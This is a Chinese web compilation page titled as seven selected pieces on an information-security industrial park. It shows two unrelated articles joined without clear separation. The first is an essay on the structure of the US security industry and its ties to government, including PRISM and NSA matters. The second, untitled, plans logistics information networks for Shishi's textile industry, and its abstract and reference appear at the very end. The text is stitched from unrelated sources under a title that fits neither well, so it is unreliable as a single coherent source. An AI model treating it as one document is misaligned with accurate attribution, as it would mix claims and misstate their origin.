网络信息安全产业园(精选7篇)
导读:孙子兵法云“知己知彼,百战不殆”。在中美网络安全领域“斗而不破”的遏制与反遏制、打压与反打压博弈中,对美方的战略、能力、产业、技术等进行全面综合的了解至关重要。但遗憾的是,过去中方的视角长久的放在关键基础技术领域,放在微软、英特尔、谷歌、苹果等厂商身上,却忽略了美国产业体系中一股强大而独立的力量,其信息安全企业星群,他们也同样是美国全球战略能力的基石。
在网络信息攻与防的双方向上,美国均拥有着全球最顶级的巨大威慑力和他国看似无法企及的战略优势,而来自中国的观察者易于犯的错误是——既伴着内心深深的忧惧,对这种战略优势进行着轻率地道义层面批判,却缺少对其核心支撑点——信息安全产业的深入而系统地分析。
美国信息安全产业并不是一台生冷而高耸的巨型兵工厂或商业机器,而是一组生动、富有理想与活力的企业符号。长期以来,国内对这些企业符号充满了疑问和不解,一方面,是其传统的巨头Symantec、McAfee等始终屹立不倒;另一方面则是新兴企业与新兴技术此起彼伏。
巨头型厂商厚重全面的解决方案与独立安全厂商的新概念、新产品交相辉映,令观者应接不暇,更令把美国当作信息化和信息安全建设标尺的各国政府和行业用户茫然无措。
但如果我们把这些企业的规模、并购关系、技术领域、市场范围以及与美国政府的关系,完全罗列开来,进行梳理的时候,就会发现他们并非如突兀坠落在平原上的巨型陨铁,而是有着鲜明的层次和关联的大战略基石。
一、美国信息安全产业格局的层次分析 一如美国在其他信息产业领域的优势一样,以Apple、Google、IBM、Microsoft、Ora-cle、Cisco、Qualcomm、Intel、Facebook(按市值排序)等为代表的基础信息巨头同样在信息安全产业架构中扮演着宽阔而坚实的地基。其稳居全球供应链的顶端位置、进行大量的信息聚合和创造、改变全球用户的工作和生活方式,其一方面构成美国全球战略威慑能力,同时又能反过来游说院府影响美国的政治走向。
而透过斯诺登事件,公众们亦知道了,他们与美国的庞大国家机器微妙互动,强化了后者覆盖全球的情报能力。由于这些企业规模庞大、市值往往以千亿美金衡量,并持续进行并购,不断扩容体量,我们可以称其为信息“寡头”企业。
在这些寡头层次之上,则是信息安全产业的巨子们Symantec、McAfee、Trend micro(趋势),他们市值数十亿美金乃至数百亿美元,尽管这些企业均从反病毒起家,但经过多年发展和持续地兼并重组,其产品跨度已经形成完整的从流量到端的解决方案能力、并向集成、存储、云等安全关联的各方面扩展,产品用户覆盖全球。对中国类似石油、电信、电力等关键行业来说,选择其产品曾长期被视为“政治正确”的选择。
而对更多的安全厂商来说,其依然专注于系统安全、网络安全或其他安全技术的某个窄带领域,可以称其为专业安全厂商或独立安全厂商:
美国专业安全厂商,除了具有单点专注的特点外,大多不仅服务于美国用户,也坚定地追求着全球市场。他们是全球网络安全技术发展的风向标,他们享有“美国制造”的国家品牌带入感,引导着信息安全创新的话语权。
但同时他们与寡头和巨头企业不同的是,他们执行更为稳健务实的市场政策,驾轻就熟地寻找当地国家的集成商和掮客企业,通过OEM绕过当地政策和法制的保护,如国内很多场合的“国产”防火墙招标就是Fortinet(飞塔)等美国品牌的“贴牌产品”内战。
随着市场发展,这些独立安全厂商既具有成为新巨头的潜质,同时也有被巨头收购,成为其解决方案中一部分的可能。
而由于美国瞄准全球市场的安全厂商和明星过多,亦掩盖了若干隐形的冠军和一个特殊的市场,即面向其政府和国家机器用户的专用市场。而其中又呈现出两个企业群落,即专用技术企业和承包商。
专用技术领域,是和美国国家机器作业关联密切的技术服务领域,包括入侵取证、数据恢复、数据分析等,这些厂商有的是独立厂商,也有的是巨头厂商或其他大型传统企业(甚至是非IT企业)的一部分。大数据分析的明星企业Palantir作为美国官方的御用安全企业,是这个产业群体的代表之一。
而承包商则往往是更深入情报作业的直接参与和执行者,类似斯诺登所效力的Booz Allen Hamilton、信号分析处理厂商Argon ST、面向C4I系统的网络安全服务厂商GnostechInc等。在这个层次上,我们可以看到美国信息安全思想与其国土安全观和全球战略能力的融合。
这些厂商不止服务于专用网络信息系统,也服务于关键工业生产、军事装备等领域。安全思想通过这种服务,深达到更多的关键层次领域,达成虚实结合、网电一体。信息安全概念、意识和方法也同时扩散到社会基础、国土安全和军事体系的全景纵深。通过图1我们可以看出,尽管美国信息安全企业技术领域繁多,投资关系复杂,但这其中几条边界非常清晰。
●基础寡头和独立安全厂商的边界: 尽管传统寡头厂商不断兼并独立安全厂商以扩大体量,但我们看到的是其既未导致“独立安全厂商消亡”而构成对自由竞争的伤害;同时也没有改变寡头厂商的原有轨迹——他们依然坚定扮演集成服务提供商或者网络服务提供商的固有角色。
如Google绝不会因为兼并Virustotal(多引擎扫描服务提供者)和Zynamics(安全分析工具软件制造商)而变成一个在安全市场上有所动作的厂商。无论规模大小,美国厂商通常都具有简单清晰的模式与价值观。
●开放市场和专有市场的边界:
从某种意义上说,以全球市场为目标的美国独立安全产品厂商专注而窄带,使其不会向与国家机器的情报体系“过从甚密”的方向游移,从而导致伤害其面向全球用户的信任力。
而专有市场的存在,亦既有助于形成美国独有的国家安全作业能力,避免信息外泄,同时,也保证这些厂商不必在全球市场收益和美国官方诉求间徘徊,而可以坚定地如被Fireeye收购之前的Mandiant一样,在中美大国博弈间,充当非官方的技术喉舌(而即使这种并购发生后,Fireeye也在努力强调“M部门”与Fireeye本体之前的区别)。
从这个意义上说,这个层次不仅是一个商业层次,也构成了大国话语权博弈的立体纵深。
●政府、军方与承包商的角色与关系:
围绕军方和情报机构承包商体系是重要的美国商业文明特色,其在具体的情报作业层面,弥补了国家机器本身的人力不足,遏制了大政府倾向,而同时也形成了一个独有的信息层次屏障。尽管出现了斯诺登事件,但我们依然要看到,在充分利用信息的联通和共享,主动国家安全能力提升的思路下,承包商层次其实在很长时间扮演了一个信息和作业中间带的角色。
同时也可以看到,这些承包商(包括部分专有市场厂商),往往由前军政界人士发起或者担任高管,其也建立了一种约定俗成的合法利益输送层次(旋转门),形成了一种既同谋共赢、又不伤害美国国家能力的特殊(而且是合法的)政商关系。
这个看似严谨又充满活力的庞大体系,并不是某种计划经济的产物,也不是某届或某几届总统班子马基雅维利式先验设计的结果。而是在其“企业自由”的立国支撑点下,持续遵循内部自由竞争、对外强力输出的产物,可以概括为“顶层设计、自由生长、建立规则、强化优势”。
二、领跑者:巨头的形成与价值
美国作为计算机和互联网的本土,在上世纪80年代的个人计算机革命中,亦诞生了一批其早期安全企业,这其中就包括了被称为信息安全传统三大的Symantec、McAfee和Trend Micro(尽管Trend Micro自诩为治理结构跨美、日和台湾地区的国际厂商,而并不完全是美国厂商,但其根本上还是获益于美国的土壤和产业机会,并也在硅谷信息安全群中扮演重要角色)。
他们的共同特点都是创建于上世纪80年代,在反病毒领域获得了产业认同和早期价值最大化,而逐步成为拥有了上万名员工、十亿美金量级的销售额的企业巨人。
他们当初在反病毒领域获取第一桶金并不偶然,信息安全市场有两个最重要的最成熟的领域,一个是以反病毒为代表的系统(主机)安全领域,一个是防火墙(安全网关)为代表的网络安全领域。这两类产品都是在与主流威胁对抗中不断改进成型,并逐步具备了共同特点,即经过基本的安装配置部署后,就自行成效,可以不经人工干预而产生效果。而相比之下,类似IDS、扫描器等对使用者的能力和精力有较大依赖的产品,均未能形成较大市场规模。
病毒的威胁在上世纪80年代下半期即快速到来,因此主机安全技术的商业化,要比网络安全技术早了十余年。但 “三大巨头”并非唯一的先行者,上世纪80年代末、90年代初,反病毒企业在全球如雨后春笋般浮现,反病毒核心技术“反病毒引擎”的第一技术平台此时亦并不在美国,反而是由Kaspersky和Dr.Solomon为代表的欧系厂商占据,与美国厂商呈现争锋之势。
在这种对垒中,美国国内市场庞大的内需、资本市场的澎湃活力所带来良好融资能力、以及全球市场的布局辐射,让尚在幼年的“三大”站上了巨人肩膀。他们纷纷较早跃上美国资本市场,并开始了持续的并购之路。
使之从单一反病毒厂商发展为综合性的全领域解决方案的厂商。在这个美国企业能力不断强化,欧洲企业一边顽强创新、一边退守自保的过程中,Dr.Solomon很快被McAfee收购,而McAfee则完整获得了其先进引擎能力。而卡巴斯基虽然也稳健发展,成为俄罗斯IT的旗帜性企业,同时也成为俄罗斯国家安全的支点企业,但从商业上看,其并未成长为可以在市值(估值)和国际市场覆盖能力上与“三大”比肩的巨头。
传统“三大”与美国情报体系是否有密切的互动?目前尚未有公开资料可以证明。如从公开资料上看,至少没有证据显示他们参与了“棱镜”计划,但棱镜更多是NSA与具有内容和关系价值的互联网巨头厂商的合作。
而安全厂商自身的资源更多是安全事件、端设备环境和流量行为的信息,显然从这个层面上,作为安全厂商的情报价值是不够的。但传统“三大”对全球行业用户的部署到达能力、端和流量的结合手段、与作为安全厂商进行数据采样提交方面的用户先天容忍度,又有独特的情报优势。如果我们关注《Symantec互联网安全分析报告》,我们就同样可以看到能够采集这些资源所依托的巨大部署规模,以及这些信息所投射的战略价值。
三、专业安全厂商的创新迭代与创新方法
在美国独立信息安全企业的星群中,最富有魅力和研究价值的,是其专业安全厂商的创新迭代。在这个过程中新企业、新技术、新公司、新产品品类不断涌现,而从威胁到产品形态的新概念更迭,也让全球跟跑者们叫苦不迭。
无疑这种概括新威胁、定义新概念、形成新品类式的成熟打法,驱动了多家美国网络安全企业从初创到“各领风骚几年”式的快速迭代成长,但这种成功绝不是源自单纯的概念炒作和商业包装,而是有其值得尊敬的内因与外因。
其内因是:对新威胁的敏锐把握,丰富的产品想象力,迅速的单点核心技术突破,并形成新形态品类的能力;其外因则是:对于创新的鼓励和宽容,以及鲜明的专有核心技术价值导向。
在美国安全企业创新迭代案例中,其中最闪亮的轨迹,是网络安全厂商Netscreen、Fortinet、Paloalto Network和Fireeye依次崛起。而其所提出的产品概念,均创造出了细分市场,也依次在基于流量的安全产品中成为独立品类冠军。我们将这四家厂商的要素,绘制成表2,由此我们则可以看出,这些企业所形成的产品品类概念,绝非空泛包装,而是应对当时主流威胁的结果。
Netscreen面对信息高速公路建设引领的带宽快速增长趋势,提出了基于ASIC的高速硬件防火墙的思路;Fortinet面对网络应用发展带来的邮件蠕虫、垃圾邮件、广告软件等威胁,提出了“统一威胁管理”的概念;Paloalto Networks面对互联网客户端和SNS的大发展等带来的新威胁,设计了“下一代防火墙”;而Fireeye面对政经集团背景的APT攻击大潮,采用沙箱前置与流量产品结合的方法,亦形成了自己独特的反APT和0day漏洞的产品形态。
这四个厂商的创新过程,都是典型的硅谷路线。强力的技术核心团队迅速得到技术资本的关注和推动支持,在发展的过程中资本给予了研发之路高度的耐心和容忍,如Paloalto Network在起步近两年后,产品才基本成型,Fireeye在成立几年后,才找到了我们今天看到的正确产品思路。
更令人称道的是,在他们尚还弱小,并无足够的支付能力之时,大量人才就因其良好的发展前景和上市预期,从传统“三大”和其他主流企业纷纷加盟,呈现了一种令国内业界难以想象逆向流动的生态。
资本环境的追捧创造,必然推动了人才富有理想主义和冒险精神,而理想主义和冒险精神又获得了高回报的激励,这就构成了一个完整的正能量链条。
四、变局:大并购时代
2010年起,美国整个信息安全产业格局的发展开始进入到新的大并购时代。从2010年7月开始,在之后将近两年的时间里,美国企业发起了超过10个价值10亿美元以上的并购案,其中最有影响力的无疑是“Intel对McAfee的并购”,这是信息安全开始走向寡头化的风向标。
美国的传统软件厂商、大集成商、芯片供应商和既有的巨头安全企业,都纷纷出手把大量独立安全公司融入体系,这些并购使其技术原有短板得以补充、新技术的储备不足获得应对以及解决方案更加完整。
我们通过图2展示了在大并购时代所推动的跨行业寡头体系的形成。但在这个过程中,我们并未看到这种巨型“托拉斯”所带来的垄断和对创新的扼杀倾向。恰恰相反,这些并购多数并不是基于扩大市场份额、消灭竞争对手的考虑,而更多瞄准单点上有突出技术优势的以及能够弥补、或强化收购者自身短板的企业。
被并购的新锐技术团队,多半因其技术优势而获得了良好的溢价,几人、十几人的小团队都可因其核心技术能力,获得千万甚至数亿美元的估值。从而使收购成为良好的技术创新团队自我价值实现和风险投资者的推出通道,并引发了“从寡头中再次创业,再次被寡头收购”的风潮。
因此,大量并购不但没有消亡了美国在安全领域中的基础创新能力,反而使之成为了技术创新的动力源泉。
而在国际博弈中,来自欧洲、日本、印度等国的个性安全企业,则往往在崭露头角后,被美国巨头厂商兼并。从这些企业团队角度来看,已经达成了某种成功(但交易中的议价能力往往有所不足)。但从国家能力对比来看,则汇入了美国对单极世界主导地位不断被强化的趋势。
而反之,如果被收购的是美国厂商,而买主来自其他国家。美国官方和民间机构,则会陷入异常的敏感之中,美国官方所形成的《An Analysis of Chinese Investments in the U.S.Economy》一文中虽然轻描淡写的说:“对于中国的国际直接投资,美国政府并没有统一的立场。国家和地方官员寻求增加经济活动以吸引中国的国际直接投资„„同时,其他联邦官员极其担心中国的国际直接投资在国家安全和经济安全方面的潜在影响。”
但如果这种投资涉及网络安全,则基本不可能达成,2011年初,美国外国投资委员会阻碍华为收购小厂商3Leaf的案例,就是这种紧张感的典型案例。
中国企业在美国的并购动作,显然会触痛美国政府最敏感的神经。但如果认为这种紧张感仅仅是针对中国的,其实就误读了美国固有的“国家安全情结”,一个鲜明的例子是,即使对于同在西方阵营的小老弟以色列,美国也同样做出了阻碍Checkpoint收购美国著名开源安全厂商Sourcefire的举动。
五、产业秩序:互信与互动与产业联盟
2011年的RSA展会上,新兴的主机安全厂商Bit9打出了对巨头厂商McAfee的攻击性广告,但这其实是美国式的技术幽默。McAfee无疑会警惕Bit9,并视其发展做出对应的反应,但不会是那种“东方式”的强势打压。
自由竞争是美国企业发展的核心动力,这种动力中既有价值导向,也有规则定义——鼓励竞争、鼓励创新、限制垄断。
这种厂商间既存在合作,又存在互补、互信的一个良好例证是——基于各自的云化服务,美国已经形成了一个反APT作业的“事实联盟”,在这个体系上,有Palo alto Networks所贡献的可执行文件鉴定服务、Wildfire、Bit9所贡献的海量白名单和文件信誉鉴定、已被Google收购的Virustotal提供的多引擎对照扫描+静态分析+动态执行服务、Fireeye提供的文档格式溢出和移动应用鉴定服务,而一些新锐移动云端安全服务厂商如Trustlook、Virtual Threat等亦可能成为体系的一员,各厂商间购置对方的分析服务,作为自身分析能力的扩展,同时还有Solera等厂商兼容各家产品进行集中分析,Mandiant等则负责传播造势,从而形成了一个应对APT的产业资源体系和事实上的利益同盟。
六、政商关系解读
对于美国IT企业与政府间的关系,有两种意见都是偏颇的,一种是全面拔高其IT企业的道德操守和信息自由信仰,而对其与美国国家机器间的互动关系视而不见;而另一种则堕入彻底阴谋论,把一切美国IT产品都简单视为具有主观恶意的逻辑炸弹,亦把一切美国IT厂商都视为其情报体系的紧密互动层。而抛开这两种先天偏见,则有助于我们理清美国安全厂商与政府的微妙关系。
例如有人以德国《明镜周刊》报道的“NSA的ANT系列信息装备”作为美国安全企业为美国情报机构安放后门的证据,但经过对相关资料的分析研判,更准确的表达应该是有多家安全产品的弱点可以被NSA利用,这里需要注意的是“弱点”和“后门”有本质的区别,否则就很难理解为什么中国厂商华为也在这份名单之上。笔者认为,这个案例总体上只能说明NSA信息武备的丰富程度和强大的弱点与漏洞挖掘能力。
我们从斯诺登事件引出的信息中,亦可做出下列分析:
1.与美国情报机构建立密切关联的多数企业是有信息聚合能力的互联网巨头,由于其建立在全球用户以信息上载、聚合以及置换免费服务的模式基础上,美国可以通过爱国者法案对其数据实现“合法”监控。
2.Cisco与NSA的密切联系可以被证实,但并不能说这就代表了美国情报机构与其网络设备和安全厂商的典型关系,NSA可以放心与Cisco合作的原因,是后者已经建立起了全球市场的牢固不可替代性,同时其产品覆盖能力也有足够的战略价值。而其他美国厂商并不具有足够的政治风险抵御能力。
3.美国已经通过类似标准污染的方式(类似NIST SP800/90标准中对随机数强度的弱化),实现对更多产品的“上游感染”,而不需要直接和这些厂商发生情报作业的关联。
笔者愿意做出这样的判断,在全球范围普遍性的伤害美国企业的用户信任力,并不符合美国国家利益的最大化。换言之,美国在信息领域的战略威慑能力,首先来自其产品与服务的到达能力和覆盖程度,而不来自其中是否有可利用的后门。这种态度不是期望为美国专业安全厂商洗白,而是希望大国博弈的因应之策建立在理性的思考和分析之上。
我们不妨看棱镜门中的一个事实,在美国的互联网大佬中,Facebook是最后一个加入的,同时也是棱镜“上榜”企业中最后一个上市的,而尚未上市的Twitter则根据资料显示尚未加入。如果做一个类比来看,这可以称为“把羊养大了再挤奶”的原则,而不是“把猪养肥了再杀掉”。
而通过NSA向RSA公司支付1000万美元,换取其使用有后门的算法的操作,我们亦可以做出这样的判断,美国政府积极地为那些承担国家义务的企业提供补偿。
另一个案例或许也能为这种判断提供注脚,当美国政府要求Fireeye对中国禁售的时候,也同时设定规范,要求与五角大楼等政府机构有网络连接关系的军火商、大的IT厂商部署反APT产品,这种导向形成了在其“爱因斯坦”计划之外的一种单点但有效的反入侵能力层次,推动了以Fireeye为代表新锐厂商的产品部署,而从客观上,这构成了要求Fireeye放弃中国大陆市场的经济补偿。
七、启示录
网络信息安全早已不是实验室技术,其在本世纪初就进入了以大产业体系为基础,以企业创新为动力的时代。可以说没有产业就没有技术与产品,而没有企业这个基本元素,也就谈不上产业的存在。
经济界已经充分认识到中小企业是创新与社会发展的核心动力,而在信息技术领域,我们却依然期望简单地通过大规模的国家投入或是某个应用方向赌博式的技术绕前就可以改变当前的被动局面。美国信息安全产业的强大,为我们正确理解信息化和网络安全之间的关系提供了典范注解。国内有部分声音认为,依靠信息系统的国产化和信息系统某些安全特性的增强,就可以一劳永逸地抛弃所有的安全风险、威胁和积弊,而不再需要安全产品的保驾护航。
而事实上我们看到,作为拥有最高“国产化”率、最好的核心技术自给能力的美国,自身也同样面临着广泛的安全威胁,也拥有着最为发达的信息安全产业。这说明,强大的自主信息化和强大的自主网络安全互为保障,相辅相成,不可能互相取代。
美国信息安全产业的层次结构、价值导向、运行规则等,显然值得我们分析、研究、借鉴。
充足的内需是美国信息安全产业得以发展的基础,美国用户在信息时代发展中享受了最先进的技术成果,也同时深刻感受到了安全威胁,从而认识到了信息安全产品和服务是一个独立的市场门类和层次,这个层次不可能依靠信息体系自身内置的安全能力所取代。这种认识促成了信息安全产品采购在信息化的预算中长期超过20%的高比重,这为美国安全企业形成了充分的收益空间。
活跃的资本力量和成熟的资本市场则为美国安全厂商提供了助跑和催化机制,其对风险、收益、创新的成熟理解,促成了保护创新、引导创新的价值导向。从Fireeye亏损3000万美元上市,却能因其技术方向、产品能力和人才储备等因素获得极高的市值,我们就能看到美国证券市场的特有魅力。
而CIA背景的In-Q-Tel模式的横空出世,这代表了美国官方直接入局这一领域,为美国国家安全孵化出未来所需的技术支点。清晰的市场规范、对商业文明和契约精神的成熟理解、合理的政商关系设计等等,则都成为美国信息安全产业有利的保障力量。从而使“鼓励创新的中小安全企业发展,遏制垄断对创新的伤害”成为社会共识。
在大国竞技中,跟跑者未必要对领跑者亦步亦趋,但需要分析领跑者的领先轨迹。这种轨迹中有无法模仿的先发优势和地缘特点,以及历史经纬的偶然眷顾;但同样会有因果清晰的必然规律。
石狮纺织服装产业是“中国休闲服装名城”———石狮市的第一支柱产业。近几年来, 石狮市纺织服装业更加蓬勃发展, 纺织服装业总产值从2004年的137亿元增长到2008年的242亿元, 增长了76.64%。而2008年石狮市工农业总产值为515亿元, 纺织服装业总产值就占了石狮市工农业总产值的47%, 几乎占了石狮市工农业发展的半壁江山 (图1) 。
资料来源:石狮市统计局《石狮市建市以来主要经济指标2004~2008年》
二、石狮纺织服装产业物流存在的问题及原因分析
石狮纺织服装产业的迅猛发展需要现代化的物流来支撑, 但是, 石狮纺织服装物流远远适应不了这一发展需求。有调查表明, 美国服装企业物流成本仅为总成本的8.6%, 我国服装企业平均物流成本高达21.3%, 石狮的物流成本还会更高。因而石狮纺织服装业要取得更大的发展, 需要解决物流发展这一瓶颈。
(一) 传统的纺织服装物流滞后
传统的纺织服装物流已经跟不上纺织服装产业的发展要求, 表现为销售市场的配套物流设施缺乏、运输基础设施相对滞后, 影响物流运输的效率、仓储设施设备陈旧、结构和功能单一。
(二) 第三方物流弱小
目前石狮的第三方物流还处在起步阶段, 规模小, 管理水平较低。石狮的第三方物流还停留在经验管理、粗放管理阶段, 未能解决好先进管理思想、管理方法、管理技术的实际应用问题;基础设施简易、落后, 机械化、自动化程度低, 只能提供比较单一的物流服务, 如运输、货代、仓储、装卸、加工、配送中的一个或两个服务功能。
(三) 供应链管理缺乏
纺织服装产业缺乏完善的供应链系统。当前石狮已形成以服装加工为龙头的纺织服装供应链, 涵盖纺织、染整、成衣加工、辅料生产、服装销售等环节。但是由于供应链各环节的生产销售企业没有形成一套完善的供应链系统进行管理, 各谋其利, 使得贯穿整个供应链其中的物流成本居高不下。例如, 在生产方面, 由于没有建立供应链系统的信息共享, 供应链各环节的企业之间互相隐瞒市场销售信息, 不利于各企业建立满足市场需求的生产计划, 从而导致制定的生产计划远远大于市场需求即所谓的牛鞭效应, 造成极大的物流仓储、运输等各环节的成本消耗。
(四) 信息化建设滞后
纺织服装供应链系统缺乏, 一个最主要的原因在于纺织服装业企业信息化建设的进度缓慢。石狮的纺织服装企业对信息化的认识在思想上存在着一些不正确的想法, 有的企业家简单地认为纺织服装业信息化建设无非就是企业多买几台电脑, 或者使用了服装CAD, 就已经实现了信息化。有不少企业心存疑虑, 担心信息安全得不到保障, 其利益将受到损害。
纺织服装业企业信息化建设缓慢, 导致了物流信息化发展和管理手段相对落后。多数拥有企业网站的企业对互联网的使用还停留在表层, 其企业网站的内容主要以企业形象及产品宣传为主, 信息更新缓慢、网站点击率较低。虽然有些企业不同程度地尝试了电子商务, 但基本停留在供求信息的发布阶段, 电子商务在企业的B2B交易活动中所占比例很小。再者, 纺织服装的批发零售业、仓储业和交通运输等物流主体行业从事现代物流的技术含量不高, 信息化管理手段相对落后, 对于网络信息和电子技术不能高效利用。
(五) 专业物流人才缺乏
石狮纺织服装物流发展缓慢的一个主要原因在于专业物流人才的缺乏。纺织服装物流, 特别是信息化的建设需要大量的专业物流人才, 而大中院校、企业内部对物流人才的培养明显跟不上这些需求。
三、石狮纺织服装产业物流信息网络的构建
解决石狮纺织服装物流存在的问题, 需要构建现代物流网络, 而现代物流网络的构建关键又在于物流信息网络的构建。在以往的物流规划和建设中, 人们主要关注交通基础设施、物流园区和配送中心等物流基础设施建设, 而物流信息网络却没有得到足够的重视。因此, 有必要对物流信息网络进行重点阐述。
石狮纺织服装物流信息网络主要由石狮市物流信息平台、第三方物流企业的信息系统、纺织服装企业信息系统三部分构成。纺织服装企业、第三方物流企业在物流信息平台的支持下, 完成本企业的物流运作与管理, 以及与相关企业之间数据信息的交换和查询, 从而实现企业内部信息系统与外部信息资源的无缝衔接, 提高物流运作效率, 降低物流成本。
(一) 石狮物流信息平台的构建
1. 石狮公共物流信息平台
物流公共信息平台是指通过对物流过程相关的共用数据采集、组织和处理, 为企业的物流活动提供基础支撑信息;同时, 对行业主管部门的市场管理和协同工作, 以及政府的宏观决策提供支持的信息发布、查询系统。物流共享信息主要包括物流服务信息、商品综合信息、海关关贸信息、商检信息、车辆跟踪信息、交通管理信息、港口水运信息、铁路车站信息、机场航空信息、道路设施信息、规划国土信息等。
物流公共信息平台由车辆调度跟踪支持子系统、货物跟踪支持子系统、综合信息发布子系统、宏观决策支持子系统、信息查询模块、数据集成模块等功能模块组成。 (1) 车辆调度跟踪支持子系统。该系统主要是将获得的交通信息结合GIS (地理信息系统) , 支持运输系统对车辆的调度计划和跟踪。 (2) 货物跟踪支持子系统。该系统主要运用先进的GPS和GIS技术跟踪、记录货物在途情况, 为货物跟踪查询提供及时、准确的信息。 (3) 综合信息发布子系统。该系统主要用于发布与纺织服装物流行业相关的政策法规、天气状况等信息。 (4) 宏观决策支持子系统。该系统是使政府可以对物流公共信息平台提供的物流企业生产经营状况、物流设施运行状况、商品仓储货运量状况和物流交易市场状况等信息进行监控, 及时决策。 (5) 信息查询模块。该模块给用户提供一个查询信息的平台, 而且不同用户可以采用不同的查询方式, 获得相应的需求信息。 (6) 数据集成模块。该模块集成了所有物流服务需求企业和物流服务供给企业的相关信息, 同时还集成了交通、工商、税务、商检等行业部门的信息, 为企业、政府部门提供决策和管理的支持。数据集成模块采用后台处理的方式, 对于自身拥有的数据可以直接输出到用户端, 而对于其他系统存放的数据, 则提供数据查询方式 (图2) 。
2. 石狮物流交易平台
石狮物流交易平台的主要功能是为物流服务供需双方提供一个网上交易的平台。该平台主要包括交易大厅、政府服务子系统。
交易大厅主要包括: (1) 信息发布模块。该模块主要用来发布企业供需双方的供需信息, 如物流服务提供企业的配送、仓储加工、装卸搬运、物流总代理等市场需求信息;物流服务需求企业需要的资质、特色服务、信誉状况、物流服务价格、范围等供给方信息。 (2) 交易模块。在供需双方达成一致意见后, 进行网上交易, 进行相应的电子转账, 并通知双方。同时, 系统发回交易成功信息, 将信息发布模块的供需信息消除。
政府服务子系统主要包括: (1) 海关报关系统。企业可以通过网络进行各类进出口的通关手续申报, 简化海关单证审核手续, 提高通关效率。 (2) 税务信息管理及报送系统。通过网络系统完成税务管理相关的报送纳税申报表、财务报表及其他有关资料。 (3) 工商信息管理与报送系统。利用网络和计算机技术完成工商管理机关对工商户的各种管理业务。 (4) 银行电子交易汇兑系统。银行电子化的一个部分, 通过系统可以实现网上结算。 (5) 企业信用管理信息系统。信用管理系统是以记录企业经营诚信度为主要功能的商业系统, 通过企业信用管理系统可以规范企业行为, 并且通过实时的网上信用管理系统, 可以查询企业的历史诚信资料。
3. 物流信息公共交换平台
信息公共交换平台作为物流信息平台的组成部分, 将担负起物流信息系统中公用信息的采集、加工、中转、发送, 以及不同用户之间信息交换的数据规范、格式转换等功能。因此, 信息公共交换平台主要用来实现石狮市纺织服装企业之间、政府各职能部门与企业之间进行的EDI及各类数据信息交换过程的标准化转换功能, 以便更好地支持异构系统互联, 以及不同行业和不同格式数据之间的相互交换与分享, 真正打破物流信息共享瓶颈, 实现物流信息的无障碍交换与传输。
(二) 第三方物流企业信息系统的构建
1. 第三方物流企业信息系统的结构
第三方物流企业信息系统的结构主要包括: (1) 客户管理。主要包括对企业客户管理、供应商管理、经销商管理。 (2) 基本业务管理。基本业务管理主要包括订单管理、库存管理、运输管理、配送跟踪管理和报表管理。1) 订单管理:接受客户的订单、处理订单, 并且依据不同的条件对订单进行查询和统计。2) 库存管理:包括出入库管理和在库盘点管理, 入库管理包括货物的入库登记、各种物品库存信息的查询和统计;出库管理包括物品出库登记、出库信息的查询和统计。3) 运输管理:包括可用运力资源管理、区域管理和车辆管理。4) 配送跟踪管理:配送管理包括配车计划和配货计划;状态跟踪管理包括车辆调度、回单确认、货款结算等。5) 报表管理:这是物流管理信息系统中最主要的信息输出手段, 是企业决策者和客户了解业务状况的依据, 它既可以提供动态的统计报表功能, 也可以提供多种特定的统计报表等。 (3) 财务管理。管理物流业务中与费用相关的各种数据, 以及对物流成本的计算、分析和比较。 (4) 物流优化分析系统。主要包括多级库存系统分析优化模型、车辆路线优化模型、全球定位系统模型。 (5) 物流预测。主要依据市场信息和企业业务数据完成预测。 (6) 辅助决策支持。主要包括各个基本物流业务的完成状况、公司物流绩效分析、评价、预测, 主要供公司高层分析决策用。
2. 第三方物流企业信息系统构建需采用的技术
石狮市第三方物流企业为了完成信息系统的构建, 需加强企业的信息化建设, 加快推广使用电子数据交换技术 (EDI) 、条码技术、电子订货系统 (EOS) 、射频技术、销售时点信息系统 (POS系统) 、地理信息系统 (GIS) 。
(三) 纺织服装企业信息系统的构建
1. 纺织服装企业信息系统的采用
(1) 分销零售管理系统 (DRP/POS) , 主要用于服装分销和专卖店管理。包括电子收款系统、客户关系管理、物流管理、仓库管理、分销管理、销售和促销管理、款式文档管理。
(2) 贸易管理系统, 主要用于服装贸易公司的管理。包括款式文档管理、产品开发、样品管理、销售管理、成本管理、样品生产管理、关键任务、样品发票管理以及客户工作入口。
(3) 企业资源规划系统 (ERP) , 是专门针对纺织服装工厂独有的商业模式和业务流程开发的, 包括:1) 产品开发。包括服装款式库、颜色库、物料库、CAD/CAM连接、样板订单、样板收送、样板条码管理、样板进度跟踪、板费跟踪等功能。2) 订单管理。包括详尽的订单资料、服装相关的详细资料、自动生成后续单据、订单合并生成采购单、订单采购单互相核对、自动生成全套出口单据、订单进度跟踪、客户管理等功能。3) 采购管理。包括物料计算精灵、自动扣用仓存、采购比价和质检、供货商管理、采购过程监控、详尽的采购情况查询等功能。4) 库存管理。包括多角度管理库存、库存条码管理、立体式仓库管理、仓库间调拨、实时库存管理等功能。5) 生产能力计划。包括生产计划生成、生产计划变更、生产能力计划、物料供应计划、灵活的工厂日历设置等功能。6) 生产控制。包括生产制造单工序、裁数设定、条形码全程管理工票、工资表、生产费用的控制、质检功能、生产状况报表及生产能力报告等功能。7) 人力资源管理。包括工时和出勤、员工记录、工作日历、住宿管理等功能。8) 财务管理。包括进出口信用证管理、贷款管理、银行托收、应收应付、财务预算等功能。9) 关键任务管理。包括订单进程监控、资料及时通知、订单的权限设置、重要工作自动提示、延期预警、采购提醒、财务预警、关键任务报告等功能。对于有外贸业务的纺织服装企业还可开发包括有进出口贸易管理、船务管理功能的系统。
2. 纺织服装企业以ERP系统为核心的企业管理信息化建设
石狮纺织服装企业应该集中资源推进以ERP系统为核心的企业管理信息化建设, 把物流业务从主业中剥离出来, 外包给第三方物流企业, 建立纺织服装生产、批发零售、物流等的分工协作关系。通过以ERP系统为核心的企业管理信息化建设, 加快企业的内部信息流, 提高企业外部供应链流动的速度, 使整个行业从采购、生产、流通加工、信息传递、集中储存、商业配送、货运代理等一系列的物流活动顺利、有序地展开, 优化企业物流流程。
摘要:作为石狮市第一支柱产业的纺织服装产业的发展需要解决物流这一瓶颈。文章围绕构建石狮纺织服装产业现代物流网络这一课题, 重点阐述物流信息网络的构建。石狮纺织服装产业物流信息网络主要由纺织服装企业信息系统、第三方物流企业信息系统、石狮市物流信息平台三部分构成。
关键词:纺织服装,企业信息系统,第三方物流,信息平台,石狮
参考文献
[1]王健.现代物流网络系统的构建[M].北京:科学出版社, 2005.
